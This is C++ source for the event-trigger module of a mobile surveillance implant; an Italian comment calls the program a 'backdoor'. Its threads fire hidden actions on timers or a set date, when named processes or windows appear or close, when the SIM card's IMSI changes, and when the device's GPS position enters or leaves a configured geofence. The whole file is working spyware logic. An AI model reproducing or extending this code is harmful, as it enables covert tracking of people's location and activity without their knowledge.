#include "Events.h"

DWORD WINAPI OnTimer(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_TIMER);
	pTimerStruct myConf = (pTimerStruct)(myData->pParams);
	unsigned __int64 time, tmp_time;
	UINT wait;
	WCHAR pathName[MAX_PATH] = {0};

	// Queste due get servono solo per controllare che statusObj si trovi
	// in uno stato coerente
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL) {
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;

	tmp_time = 0;
	time = GetTime();

	LOOP{
		switch(myConf->uType){
			case CONF_TIMER_SINGLE:
				wait = myConf->Lo_Delay;

				if(DiffTime(GetTime(), time) >= wait){
					TRIGGER_ACTION(myData->uActionId);
					EVENT_STOP_ME;
				}

				break;
			case CONF_TIMER_REPEAT:
				wait = myConf->Lo_Delay;
				tmp_time = GetTime();

				if(DiffTime(tmp_time, time) >= wait){
					time = tmp_time;
					TRIGGER_ACTION(myData->uActionId);
				}

				break;
			case CONF_TIMER_DATE: // Passata la data, parte ogni volta che si avvia/riavvia la backdoor
				tmp_time = 0;
				tmp_time = myConf->Hi_Delay;
				tmp_time <<= 32;
				tmp_time |= myConf->Lo_Delay;

				if(GetTime() >= tmp_time){
					TRIGGER_ACTION(myData->uActionId);
					EVENT_STOP_ME;
				}

				break;
			case CONF_TIMER_DELTA: break;
				// XXX - Da implementare (Lo e Hi sono in FILETIME)
				/*FILETIME cft;
				HANDLE hMod = INVALID_HANDLE_VALUE;
				LARGE_INTEGER c_time;
				GetModuleFileName(NULL, pathName, MAX_PATH);
				hMod = CreateFile(pathName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
				GetFileTime(hMod, &cft, NULL, NULL);
				c_time.HighPart = cft.dwHighDateTime;
				c_time.LowPart = cft.dwLowDateTime;
				GetSystemTimeAsFileTime(&t_ft);
				t_time.HighPart = t_ft.dwHighDateTime;
				t_time.LowPart = t_ft.dwLowDateTime;*/

				//if(c_time.QuadPart >= myConf->Hi_Delay)
			default: 
				EVENT_STOP_ME;
				break;
		}

		if(EventSleep(MyID, 1000)) {
			EVENT_STOP_ME;
		}
	}

	EVENT_STOP_ME;
}

DWORD WINAPI OnSms(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_SMS);

	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL){
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;


	EVENT_STOP_ME;
	return 0;
}

DWORD WINAPI OnCall(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_CALL);

	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL) {
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;


	EVENT_STOP_ME;
	return 0;
}

DWORD WINAPI OnConnection(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_CONNECTION);

	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL) {
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;


	EVENT_STOP_ME;
	return 0;
}

// Il formato dei parametri e' il seguente:
// Azione da triggerare a processo TERMINATO (TRIGGER_ACTION(myData->pParams))
// Tipo di ricerca da fare (window title [1] o nome del processo [0])
// Nome del processo in WCHAR NULL-terminato
// Abbiamo un thread per processo, tuttavia il thread e' estremamente lightweight poiche'
// effettua solo un busy-cycle, il resto viene fatto tutto dalla classe singleton Process.
DWORD WINAPI OnProcess(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_PROCESS);
	UINT uTerminate, uType;
	WCHAR *wName = NULL;
	BOOL bActive = FALSE;

	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	Process *processObj = Process::self();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL || processObj == NULL) {
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;

	// Azione da triggerare a processo TERMINATO
	memcpy(&uTerminate, myData->pParams, sizeof(uTerminate));

	// Il tipo sara' a 1 se dobbiamo cercare il titolo della finestra, 
	// a 0 se dobbiamo cercare il nome del processo.
	memcpy(&uType, (BYTE *)(myData->pParams) + 4, sizeof(uType));

	// Prendiamo il puntatore al nome del processo/finestra
	wName = (WCHAR *)((BYTE *)(myData->pParams) + 8);

	if(wName == NULL) {
		EVENT_STOP_ME;
		return 0;
	}

	LOOP {
		switch(uType) {
			case 0: // Processo
				if(bActive == TRUE && processObj->IsProcessRunning(wName) == FALSE) {
					bActive = FALSE;

					if(uTerminate != CONF_ACTION_NULL) {
						TRIGGER_ACTION(uTerminate); // Processo terminato
					}
				} else if(bActive == FALSE && processObj->IsProcessRunning(wName) == TRUE) {
					bActive = TRUE;
					TRIGGER_ACTION(myData->uActionId); // Processo attivo
				}

				break;

			case 1: // Finestra
				if(bActive == TRUE && processObj->IsWindowPresent(wName) == FALSE) {
					bActive = FALSE;

					if(uTerminate != CONF_ACTION_NULL) {
						TRIGGER_ACTION(uTerminate); // Finestra distrutta
					}
				} else if(bActive == FALSE && processObj->IsWindowPresent(wName) == TRUE) {
					bActive = TRUE;
					TRIGGER_ACTION(myData->uActionId); // Finestra creata
				}

				if(uTerminate != CONF_ACTION_NULL) {

				}
				break;

			default: 
				break;
		}

		if(EventSleep(MyID, 1000)) {
			EVENT_STOP_ME;
		}
	}

	EVENT_STOP_ME;
	return 0;
}

DWORD WINAPI OnSimChange(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_SIM_CHANGE);
	Device *deviceObj = Device::self();
	Log *log;
	const WCHAR *pwImsi = NULL;
	WCHAR *pwMarkup = NULL;
	UINT uLen = 0;

	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL || deviceObj == NULL) {
		EVENT_STOP_ME;
	}

	log = new(std::nothrow) Log();

	if(log == NULL) {
		EVENT_STOP_ME;
	}

	EVENT_I_AM_ALIVE;

	// Prendiamo l'IMSI attuale e mettiamolo in un markup
	pwImsi = deviceObj->GetImsi();

	if(pwImsi) {
		// Scriviamo il markup soltanto se non esiste
		if(log->IsMarkup(EVENT_SIM_CHANGE) == FALSE) {
			if(log->WriteMarkup(EVENT_SIM_CHANGE, (BYTE *)pwImsi, WideLen(pwImsi)) == FALSE) {
				delete log;
				EVENT_STOP_ME;
			}
		}
	}

	LOOP {
		if(EventSleep(MyID, 10000)) {
			delete log;
			EVENT_STOP_ME;
		}

		pwImsi = deviceObj->GetImsi();
		pwMarkup = (WCHAR *)log->ReadMarkup(EVENT_SIM_CHANGE, &uLen);

		// Se non abbiamo un markup, creiamolo
		if(pwMarkup == NULL) {
			log->WriteMarkup(EVENT_SIM_CHANGE, (BYTE *)pwImsi, WideLen(pwImsi));

			pwMarkup = (WCHAR *)log->ReadMarkup(EVENT_SIM_CHANGE, &uLen);
		}

		// Se abbiamo letto l'IMSI ed esiste il markup, confrontiamo i dati
		if(pwImsi && pwMarkup) {
			if(wcsnicmp(pwImsi, pwMarkup, wcslen(pwImsi))) {
				TRIGGER_ACTION(myData->uActionId);

				// Aggiorna il markup
				log->WriteMarkup(EVENT_SIM_CHANGE, (BYTE *)pwImsi, WideLen(pwImsi));
			}
		}

		if(pwMarkup) {
			delete[] pwMarkup;
			pwMarkup = NULL;
		}
	}

	EVENT_STOP_ME;
	return 0;
}

DWORD WINAPI OnLocation(LPVOID lpParam) {
	EVENT_COMMON_DATA(EVENT_LOCATION);
	DOUBLE latOrigin, lonOrigin, latActual, lonActual, distance;
	INT confDistance;
	UINT uExitAction;
	BOOL bLocation;
	GPS *position = NULL;
	GPS_POSITION gps;
	counter = 0;
	events = statusObj->GetEventsList();
	actions = statusObj->GetActionsList();

	if(statusObj == NULL || lpParam == NULL || events == NULL || actions == NULL) {
		EVENT_STOP_ME;
	}

	// DWORD id azione sull'uscita | DWORD metri | 2DWORD Long | 2DWORD Lat
	if(myData->uParamLength != sizeof(latOrigin) + sizeof(lonOrigin) + (2 * sizeof(UINT))) {
		EVENT_STOP_ME;
	}

	// Azione da eseguire sull'uscita dalle coordinate
	memcpy((BYTE *)&uExitAction, myData->pParams, sizeof(uExitAction));

	// Distanza dall'origine in metri
	memcpy((BYTE *)&confDistance, (BYTE *)(myData->pParams) + sizeof(uExitAction), sizeof(confDistance));

	// Latitudine del punto di origine
	memcpy((BYTE *)&latOrigin, (BYTE *)(myData->pParams) + (2 * sizeof(uExitAction)), sizeof(latOrigin));

	// Longitudine del punto di origine
	memcpy((BYTE *)&lonOrigin, (BYTE *)(myData->pParams) + (2 * sizeof(uExitAction) + sizeof(latOrigin)), sizeof(lonOrigin));


	// E' singleton e non va distrutta
	position = GPS::Instance(5000, 1000);

	if(position == NULL) {
		EVENT_STOP_ME;
	}

	while(position->Start() == FALSE) {
		EVENT_CHECK_FOR_STOP;
		Sleep(2000);
	}

	latActual = 0.0f;
	lonActual = 0.0f;

	bLocation = FALSE;

	EVENT_I_AM_ALIVE;

	LOOP {
		if(position->getGPS(&gps)) {
			// Scriviamo il tipo di struttura e poi i dati
			DWORD dwFields = GPS_VALID_LATITUDE | GPS_VALID_LONGITUDE;
	
			// Ok abbiamo una posizione valida, diamoci dentro con la geometria sferica
			if((gps.dwValidFields & dwFields) == dwFields) {

				distance = position->VincentFormula(latOrigin, lonOrigin, gps.dblLatitude, gps.dblLongitude);

				// Se la distance e' esattamente 0.0f allora la funzione non e' riuscita a
				// convergere, percio' non abbiamo una stima attendibile
				if(distance != 0.0f) {
					if((INT)distance <= confDistance) {
						if(bLocation == FALSE) {
							TRIGGER_ACTION(myData->uActionId);
							bLocation = TRUE;
						}
					}else {
						if(bLocation == TRUE) {
							TRIGGER_ACTION(uExitAction); // Siamo usciti dalla location
							bLocation = FALSE;
						}
					}
				}
			}
		}

		if(EventSleep(MyID, 6000)) {
			position->Stop();
			EVENT_STOP_ME;
		}
		DBG_MSG(L"Alive message");
	}

	EVENT_STOP_ME;
	return 0;
}

BOOL EventSleep(UINT Id, UINT uMillisec) {
	UINT uLoops;
	UINT uSleepTime = 1000; // Step di 1000ms
	BOOL bRet = FALSE;

	Status *statusObj = Status::self();
	list<EventStruct *>::iterator iter;
	list<EventStruct *> *events;

	if(uMillisec <= uSleepTime){
		Sleep(uMillisec);

		EVENT_ID_QUERY_STOP(Id, bRet);

		if(bRet)
			return TRUE;

		return FALSE;
	}else{
		uLoops = uMillisec / uSleepTime;
	}

	while(uLoops){
		Sleep(uSleepTime);
		uLoops--;
		EVENT_ID_QUERY_STOP(Id, bRet);

		if(bRet)
			return TRUE;
	}

	return FALSE;
}

